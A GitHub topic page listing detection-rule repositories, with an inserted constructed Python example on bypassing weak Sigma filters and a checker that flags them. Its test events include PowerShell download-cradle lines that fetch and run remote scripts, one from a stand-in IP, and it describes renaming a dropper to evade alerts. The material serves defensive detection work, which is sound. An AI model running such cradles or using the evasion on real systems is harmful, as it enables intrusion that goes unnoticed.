detection-rules
There are 12 repositories under the detection-rules topic.
checkmarble/marble
Marble - the real time decision engine for fraud and AML
sublime-security/sublime-platform
A free and open platform for detecting and preventing email attacks like BEC, malware, and credential phishing. Gain visibility and control, hunt for advanced threats, collaborate with the community, and write detections-as-code.
mandiant/thiri-notebook
The Threat Hunting In Rapid Iterations (THIRI) Jupyter notebook is designed as a research aide to let you rapidly prototype threat hunting rules.
polaris64/web_exploit_detector
The Web Exploit Detector is a Node.js application used to detect possible infections, malicious code and suspicious files in web hosting environments
0xAnalyst/DefenderATPQueries
Hunting Queries for Defender ATP
cylaris/awesomekql
Microsoft Sentinel, Defender for Endpoint - KQL Detection Packs
mthcht/ThreatHunting-Keywords-sigma-rules
Sigma detection rules for hunting with the threathunting-keywords project
Karneades/SigmaFilterCheck
Check Sigma rules for easy-to-bypass whitelists to make them more robust (https://github.com/SigmaHQ/sigma)
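The "easy-to-bypass whitelist" problem that SigmaFilterCheck targets, shown on a constructed rule, as an added example that is not SigmaFilterCheck's own code nor taken from any of the listed projects. A Sigma filter keyed on a substring or suffix of a field the attacker controls (Image, ParentImage, CommandLine, and so on) can be satisfied by naming a dropper to match, which silently suppresses the alert. The rules, the attacker-controlled field list, the two log events and the simplified evaluator (which only handles the common `selection and not 1 of filter_*` condition shape) are all assumptions made for this example; a real checker would load the rule from YAML.

```python
"""Added example: flag Sigma filter entries an attacker can satisfy, and show the bypass.

Not code from SigmaFilterCheck or any listed project. Rules, events, field list
and the evaluator below are constructed for illustration only.
"""

# Assumption: fields whose value an attacker on the endpoint chooses for a process
# they launch (binary name/path, arguments, PE version-info strings).
ATTACKER_CONTROLLED = {"Image", "ParentImage", "CommandLine", "OriginalFileName",
                       "TargetFilename", "Description", "Product", "Company"}
# Modifiers that match on a fragment rather than the whole value.
WEAK_MODIFIERS = {"contains", "endswith", "startswith"}

# Constructed rule: the filter trusts anything whose parent is named admintool.exe.
WEAK_RULE = {
    "title": "PowerShell download cradle (constructed, weak filter)",
    "detection": {
        "selection": {"Image|endswith": "\\powershell.exe",
                      "CommandLine|contains": "DownloadString"},
        "filter_vendor_updater": {"ParentImage|endswith": "\\admintool.exe"},
        "condition": "selection and not 1 of filter_*",
    },
}

# Same rule with the filter pinned to the full installed path of the vendor tool.
STRONG_RULE = {
    "title": "PowerShell download cradle (constructed, pinned filter)",
    "detection": {
        "selection": {"Image|endswith": "\\powershell.exe",
                      "CommandLine|contains": "DownloadString"},
        "filter_vendor_updater": {"ParentImage": "C:\\Program Files\\Vendor\\admintool.exe"},
        "condition": "selection and not 1 of filter_*",
    },
}

# Constructed process-creation events (Sysmon-style field names).
LEGIT_EVENT = {
    "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "ParentImage": "C:\\Program Files\\Vendor\\admintool.exe",
    "CommandLine": "powershell -c IEX (New-Object Net.WebClient).DownloadString('https://updates.vendor.example/u.ps1')",
}
ATTACK_EVENT = {
    "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "ParentImage": "C:\\Users\\Public\\admintool.exe",   # dropper renamed to match the filter
    "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/p')",
}


def _split_key(key):
    """'Field|modifier' -> (Field, modifier); a bare field means exact match."""
    field, _, modifier = key.partition("|")
    return field, modifier or "equals"


def _match_value(value, modifier, pattern):
    """Case-insensitive comparison, as Sigma backends commonly do for these fields."""
    value, pattern = value.lower(), str(pattern).lower()
    if modifier == "contains":
        return pattern in value
    if modifier == "endswith":
        return value.endswith(pattern)
    if modifier == "startswith":
        return value.startswith(pattern)
    return value == pattern


def block_matches(block, event):
    """A Sigma map block ANDs its keys; a list of values for one key is an OR."""
    for key, patterns in block.items():
        field, modifier = _split_key(key)
        value = event.get(field)
        if value is None:
            return False
        if not isinstance(patterns, list):
            patterns = [patterns]
        if not any(_match_value(value, modifier, p) for p in patterns):
            return False
    return True


def rule_fires(rule, event):
    """Simplified evaluator for 'selection and not 1 of filter_*' conditions only."""
    det = rule["detection"]
    if not block_matches(det["selection"], event):
        return False
    filters = [blk for name, blk in det.items() if name.startswith("filter")]
    return not any(block_matches(blk, event) for blk in filters)


def check_filters(rule):
    """Return (block, key, reason) for filter entries an attacker can satisfy."""
    findings = []
    for name, block in rule["detection"].items():
        if not name.startswith("filter"):
            continue
        for key in block:
            field, modifier = _split_key(key)
            if field in ATTACKER_CONTROLLED and modifier in WEAK_MODIFIERS:
                findings.append((name, key,
                                 f"'{modifier}' on attacker-controlled field {field}"))
    return findings


if __name__ == "__main__":
    for rule in (WEAK_RULE, STRONG_RULE):
        print(rule["title"], "findings:", check_filters(rule))
        print("  legit fires:", rule_fires(rule, LEGIT_EVENT),
              " attack fires:", rule_fires(rule, ATTACK_EVENT))
```

The weak rule stays quiet for both events, so the attacker's renamed dropper is invisible; the pinned rule still excludes the genuine updater but fires on the copy in C:\Users\Public. Pinning to a full path only helps where that path is not writable by the attacker, so a checker like this is a starting point, not a proof of robustness.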
austinsonger/elastic-detection-cli
Docker Container for Elastic Detection CLI
vastlimits/uberAgent-config
uberAgent configuration: UXM settings & ESA rules + checks
colvert-project/colvert
Manage your detection use cases portfolio
gapsc-us/labcomdig
Files for the lab of Digital Communications at the University of Seville.